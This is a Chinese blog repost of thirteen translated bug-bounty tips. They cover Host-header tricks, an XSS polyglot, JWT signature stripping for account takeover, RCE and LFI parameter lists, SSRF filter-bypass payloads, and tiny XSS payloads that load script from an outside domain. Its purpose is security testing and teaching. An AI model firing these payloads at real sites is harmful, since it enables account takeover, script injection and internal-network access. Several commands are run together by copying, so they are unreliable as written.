Hacker Tips - 3

admin 2022年10月19日07:59:15评论34 views字数 5915阅读19分43秒阅读模式

前辈们宝贵的经验技巧,第三趴 - 


01

HTTP主机头:localhost


Hacker Tips - 3

作者:@hacker_(由@intigriti编译)
来源:链接

在目录爆破中将Host标头设置为localhost,结果可能令人惊讶!您可能可以访问:

  • 特殊功能

  • 内部端口

  • 配置文件,SSL密钥

  • 目录列表,等等

我们甚至可以更进一步,通过执行虚拟主机枚举来尝试标识目标Web服务器上托管的所有站点。使用以下工具:

  • https://github.com/ffuf/ffuf

  • https://nmap.org/nsedoc/scripts/http-vhosts.html

  • https://github.com/jobertabma/virtual-host-discovery

注意,我们也可以使用curlwget

curl-v -H "Host: localhost" https://target/wget-d --header="Host: localhost" https://target/


02

用于XSS的JavaScript语句


Hacker Tips - 3

作者:@s0md3v(由@lutfumertcey发推

来源:链接

如何为XSS制作Java语言的Polyglot?检查由@s0md3v制作的此超级有用的信息

Hacker Tips - 3

这是ASCII版本:

-->'"/></sCript><deTailSopen x=">" ontoggle=(cou006efirm)``>-->          Breaks comment context'            Breaks Attribute Context"            Breaks attribute context/>           Closes an open tag</sCript>    Breaks JS context<deTailS     A less known tagopen         To eliminate user interaction requiredfor executionx            Dummy attribute">"          Mimics the closing of tagontoggle     A less known event handler()           Parentheses around the functioncou006efirm"confirm" function with Unicoded 'n'``           Backticks instead of ()

请注意,根据情况,我们可能只需要多语种的特定部分。请勿盲目复制和粘贴。


03
通过网站图标哈希查找相关域名


Hacker Tips - 3

作者:@m4ll0k2

来源:链接

我们可以通过查找相同的图标图标哈希来找到与目标相关的域和子域。

这正是@m4ll0k2制作的favihash.py工具所做的。使用方法如下:

catmy_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"'> targets.txtpython3 favihash.py -f https://target/favicon.ico -t targets.txt -s

Hacker Tips - 3

简而言之,favihash将使我们能够发现具有与我们的目标相同的favicon图标哈希的域名。

地址如下:

  • https://github.com/Awrrays/Bug-Bounty-Toolz/blob/master/favihash.py


04
通过JWT令牌伪造来接管用户


Hacker Tips - 3

作者:@_mkahmad
来源:链接

这是@_mkahmad如何通过伪造JWT令牌来接管帐户的方法:

  • 反编译APK并找到API端点>> / signup / users / generateJwtToken

  • 发送到中继器(Burp Suite

  • 在请求中添加了Auth-Token标头

  • 标头中使用了我帐户的身份验证令牌

  • 删除签名部分–>有效!

  • BurpSuite中使用JOSEPH更改了令牌中的用户ID

  • 在响应中得到了其他用户的JWT令牌

  • 帐户接管!

请注意,所有其他端点都在正确检查JWK令牌。


05

远程代码执行(RCE)参数 TOP 25


Hacker Tips - 3

作者:@trbughunters

来源:链接

以下是可能容易受到代码注入和类似RCE漏洞攻击的前25个参数:

?cmd={payload}?exec={payload}?command={payload}?execute{payload}?ping={payload}?query={payload}?jump={payload}?code={payload}?reg={payload}?do={payload}?func={payload}?arg={payload}?option={payload}?load={payload}?process={payload}?step={payload}?read={payload}?function={payload}?req={payload}?feature={payload}?exe={payload}?module={payload}?payload={payload}?run={payload}?print={payload}

每当您看到任何这些参数时,请注意。可能您可以以某种方式在其中注入代码。


06


SSRF有效载荷绕过

WAF


Hacker Tips - 3

作者:@manas_hunter

来源:链接

当涉及到SSRF(服务器端请求伪造)时,可以使用以下5种有效负载绕过防御:

1)使用CIDR绕过SSRF

http://127.127.127.127http://127.0.0.0

2)使用稀有地址绕行:

http://127.1http://0

3)使用技巧组合绕过:

http://1.1.1.1&@2.2.2.2# @3.3.3.3/urllib: 3.3.3.3

4)绕过弱解析器:

http://127.1.1.1:[email protected]:80/

5)用[::]绕过localhost

http://[::]:80/http://0000::1:80/

让我们提醒自己什么是SSRF漏洞,以及我们可以如何处理这些漏洞。通常,SSRF允许我们:

  • 在远程服务器上运行的回送接口上的访问服务

  • 扫描内部网络可能与发现的服务进行交互

  • 使用file://协议处理程序读取服务器上的本地文件

  • 横向移动/旋转进入内部环境

如何找到SSRF?当目标Web应用程序允许我们访问外部资源时,例如从外部URL加载的配置文件图像(在第三方网站上运行),我们可以尝试加载易受攻击的Web应用程序可访问的内部资源。例如:

  1. 我们发现以下URL有效:https://example.com:8000/page?user=&link=https://127.0.0.1:8000

  2. 然后,我们可以尝试不同的端口来运行入侵者攻击(Burp Suite),从而有效地对主机进行端口扫描

  3. 我们还可以尝试扫描专用IP(例如192.168.xx)并发现内部网络中存在的IP


07

使用RapidDNS查找子域



Hacker Tips - 3


作者:@Verry__D

来源:链接

将此小功能添加到您的.bash_profile中,以使用RapidDNS API 快速查找子域:

rapiddns(){curl-s "https://rapiddns.io/subdomain/$1?full=1"  | grep -oP '_blank">K[^<]*'  | grep -v http  | sort -u}

然后我们可以像这样使用它:

rapiddns target.com

Hacker Tips - 3

非常好,快捷。


08

如果上传了这10条东西,你能得到什么


Hacker Tips - 3


作者:@ SalahHasoneh1
来源:链接

以下是您可以通过上传完成的十件事:

  1. ASP / ASPX / PHP5 / PHP / PHP3:Webshell / RCE

  2. SVG:存储性XSS / SSRF / XXE

  3. GIF:存储性XSS / SSRF

  4. CSV:CSV注入

  5. XML:XXE

  6. AVI:LFI / SSRF

  7. HTML / JS:HTML注入/ XSS /重定向

  8. PNG / JPEG:像素泛洪攻击(DoS

  9. ZIP:通过LFI / DoSRCE

  10. PDF / PPTX:SSRF /盲XXE


09

极简的XSS payloads


Hacker Tips - 3


作者:@terjanq
来源:链接

这是@terjanq制作的微小XSS负载的集合

<!--If number of iframes on the page is constant --><iframe/onload=src=top[0].name+/NJ.₨?/><!--If number of iframes on the page is random --><iframe/onload=src=contentWindow.name+/NJ.₨?/><!--If unsafe-inline is disabled in CSP and external scripts allowed --><iframe/srcdoc="<script/src=//NJ.₨></script>"><!--Just a casual script --><script/src=//NJ.₨></script><!--If you control the name of the window --><iframe/onload=src=top.name><!--If you control the name, will work on Firefox in any context, will fail inchromium in DOM --><svg/onload=eval(name)><!--If you control the URL --><svg/onload=eval(`'`+URL)>

请注意,其中一些XSS有效负载包含contain。₨” Unicode字符串。这是一个域名(nj.rs)目前所拥有@terjanq与服务的PoC代码,将引发一个XSS状况相关的警报的web服务器:

Hacker Tips - 3

这使XSS有效负载保持很小。

有关更多XSS负载和DEMO页面的信息,请查看他指定的Github存储库:

  • https://github.com/terjanq/Tiny-XSS-Payloads


10

本地文件包含(LFI)参数 TOP 25


Hacker Tips - 3


作者:@trbughunters

来源:链接

以下列出了可能容易受到本地文件包含(LFI)漏洞影响的前25个参数:

?cat={payload}?dir={payload}?action={payload}?board={payload}?date={payload}?detail={payload}?file={payload}?download={payload}?path={payload}?folder={payload}?prefix={payload}?include={payload}?page={payload}?inc={payload}?locate={payload}?show={payload}?doc={payload}?site={payload}?type={payload}?view={payload}?content={payload}?document={payload}?layout={payload}?mod={payload}?conf={payload}

每当您看到任何这些参数时,请注意。您可能会发现LFI漏洞。


11

GITSVN文件的模糊测试列表


Hacker Tips - 3


作者:@TobiunddasMoe

来源:链接

这是使用此小型但快速的模糊列表查找gitsvn文件的快速提示:

/.git/.git-rewrite/.git/HEAD/.git/config/.git/index/.git/logs//.git_release/.gitattributes/.gitconfig/.gitignore/.gitk/.gitkeep/.gitmodules/.gitreview/.svn/.svn/entries/.svnignore

我们可能会在其中找到一些有趣的信息。


12

镜像Web目录结构


Hacker Tips - 3


作者:@2RS3C

来源:链接

找到类似此目录的目录?

Hacker Tips - 3

使用以下wget命令以递归方式将所有文件(+结构)获取到您的计算机:

wget -r--no-parent target.com/dir

现在您可以查看文件的结构,搜索和grep

专业提示:如何在目标上查找目录列表?目录列表是Web服务器配置错误,我们可以使用以下命令进行识别:

  • 谷歌傻瓜

  • Shodan搜索引擎

  • https://github.com/ffuf/ffuf

  • https://github.com/maurosoria/dirsearch


13

使用AlienVault OTX查找敏感信息


Hacker Tips - 3


作者:@mariusshoratau
来源:链接

您是否听说过AlienVault Open Threat ExchangeOTX)?

用法如下:

  1. 转到https://otx.alienvault.com/indicator/domain/<TARGET>

  2. <TARGET>替换为目标。

  3. 向下滚动到关联的网址部分。

  4. 使用AlientVault OTX,您可能会找到URL,这些URL公开了有关其他用户的敏感信息(例如收据),身份验证令牌,IDOR,有趣的参数/文件以及许多其他gem

请注意,也可以在以下位置使用API:

  • https://otx.alienvault.com/api/v1/indicators/domain/<TARGET>/url_list?limit=100&page=1

所以,这是我们可以做的:

curl-s "https://otx.alienvault.com/api/v1/indicators/domain/<TARGET>/url_list?limit=100&page=1"| jq

Hacker Tips - 3

要仅获取URL列表,我们可以这样做:

curl-s"https://otx.alienvault.com/api/v1/indicators/domain/<TARGET>/url_list?limit=100&page=1"| jq -r '.url_list[].url'

Hacker Tips - 3

干净利落!



内容来源:InfoSec,半仙仅做了翻译。

原文始发于微信公众号(仙友道):Hacker Tips - 3

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月19日07:59:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hacker Tips - 3http://cn-sec.com/archives/921175.html

发表评论

匿名网友 填写信息